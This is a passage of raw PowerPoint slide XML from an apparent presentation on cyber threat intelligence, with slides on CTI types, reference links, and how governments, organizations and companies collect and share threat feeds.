          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>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42061" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="3211830">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" spc="-5" dirty="0"/>
              <a:t>CTI</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-75" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-5" dirty="0"/>
              <a:t>Types</a:t>
            </a:r>
            <a:endParaRPr sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="133350" y="1524000"/>
            <a:ext cx="4058920" cy="4038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343400" y="1600200"/>
            <a:ext cx="4314825" cy="39624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212242" y="5908792"/>
            <a:ext cx="4463415" cy="528955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" marR="5080" indent="26670">
              <a:lnSpc>
                <a:spcPct val="141200"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>https:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>/ww</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>.optiv.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>om/blo</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>/the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>pilla</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>f-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>ll</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>sha</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>pol</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>y </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>https:/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>/www.surfwatchlabs.com/why</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>surfwatch-threat-intelligence</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>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39837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>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3969385" marR="5080" indent="-3957320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Government, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Organizations, </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Companies and  CTI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78739" y="1038097"/>
            <a:ext cx="8856345" cy="5565140"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="88265" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" marR="455930" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2880"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="695"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Private companies </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>are the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>main </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>engine for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>collection  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>and analysis of CTI</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-95" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>feeds</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="497205" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="620"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Public organizations usually learn </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>lot </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>partnering  with private companies and can benefit from shared  feeds</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3120"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Government may </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>validate intelligence </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>them</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600">
              <a:lnSpc>
                <a:spcPts val="3180"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>national defense </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>counter intelligence</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="175" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>activities!</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="179070" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2880"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="635"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>loop of feed </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>collection, sharing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>and actions between  all</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-65" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>parties!</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3500"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>However, don’t forget</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-90" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>to:</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPts val="3105"/>
              </a:lnSpc>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sanitize </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>or anonymize </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>feeds </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>when</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-65" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sharing!</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" marR="775335" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="610"/>
              </a:spcBef>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Always build your own intelligence based on your</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-150" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>own  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>feeds!</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPts val="3095"/>
              </a:lnSpc>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Analyze shared </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>feeds </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>before deploying on your</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-155" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>organization</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>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9906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0"/>
            <a:ext cx="9144000" cy="9906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239837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="3429000"/>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2737866" y="3765169"/>
            <a:ext cx="3594100" cy="559435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
